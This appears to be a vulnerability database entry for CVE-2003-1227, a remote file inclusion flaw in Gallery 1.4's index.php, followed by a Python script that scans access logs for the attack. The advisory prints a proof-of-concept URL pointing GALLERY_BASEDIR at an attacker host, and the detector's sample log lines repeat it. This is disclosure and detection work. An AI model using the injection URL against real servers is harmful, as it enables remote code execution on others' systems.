Gallery index.php Remote File Inclusion Vulnerability

Vulnerability ID: 1107509
Vulnerability type: Code injection
Published: 2003-10-11
Updated: 2006-08-17
CVE ID: CVE-2003-1227
CNNVD-ID: CNNVD-200312-234
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/23238
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-234
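|Vulnerability details
index.php in Gallery 1.4 and 1.4-pl1 contains a PHP remote file inclusion vulnerability. When running in the default mode on Windows or Unix, a remote attacker can inject arbitrary PHP code by modifying the GALLERY_BASEDIR parameter to point to a malicious util.php file. This vulnerability is different from CVE-2002-1412.
|Exploit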
source: http://www.securityfocus.com/bid/8814/info

It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs because the program fails to verify the location from which it includes the util.php script when handling specific requests to index.php. As a result, an attacker may be able to have arbitrary PHP script code executed on the remote host with the privileges of the web server.

http://www.example.org/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/
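
For detection, requests of the shape shown above can be searched for in web server access logs. The following is an added example, not part of the original advisory or of Gallery's code; the log lines are constructed and the function names `classify` and `scan` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that begins with a URL scheme, e.g. http://
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, paths modelled on the advisory URL).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Oct/2003:10:02:11 +0000] "GET /path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/ HTTP/1.0" 200 512',
    '198.51.100.7 - - [11/Oct/2003:10:02:15 +0000] "GET /path_to_gallery/setup/index.php?GALLERY_BASEDIR=http%3A%2F%2Fwww.attacker.com%2F HTTP/1.0" 200 512',
    '203.0.113.9 - - [11/Oct/2003:10:05:40 +0000] "GET /path_to_gallery/index.php?GALLERY_BASEDIR=/tmp/ HTTP/1.0" 200 901',
    '203.0.113.20 - - [11/Oct/2003:10:06:02 +0000] "GET /path_to_gallery/albums.php?page=2 HTTP/1.0" 200 4410',
]

def classify(line):
    """Return None, 'supplied' or 'remote' for one access-log line.

    'supplied': the client set GALLERY_BASEDIR at all, which a normal
                browser session has no reason to do.
    'remote':   the supplied value is a URL, matching the advisory.
    Only the query string is visible in an access log; values sent in a
    POST body or cookie need a WAF or application-level check instead.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    verdict = None
    # parse_qsl percent-decodes, so http%3A%2F%2F is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        # PHP also accepts array syntax such as GALLERY_BASEDIR[]=...
        if name.split("[", 1)[0] != "GALLERY_BASEDIR":
            continue
        if REMOTE_RE.match(value.strip()):
            return "remote"
        verdict = "supplied"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(i, v) for i, line in enumerate(lines, 1) if (v := classify(line))]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(f"line {lineno}: GALLERY_BASEDIR {verdict}")
```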
|References

Source: BID
Name: 8814
Link: http://www.securityfocus.com/bid/8814
Source: BUGTRAQ
Name: 20031011 Gallery 1.4 including file vulnerability
Link: http://www.securityfocus.com/archive/1/341044
Source: XF
Name: gallery-indexphp-file-include(13419)
Link: http://xforce.iss.net/xforce/xfdb/13419
Source: BUGTRAQ
Name: 20031012 Re: Gallery 1.4 including file vulnerability
Link: http://www.securityfocus.com/archive/1/341098
Source: BUGTRAQ
Name: 20031011 RE: Gallery 1.4 including file vulnerability
Link: http://www.securityfocus.com/archive/1/341094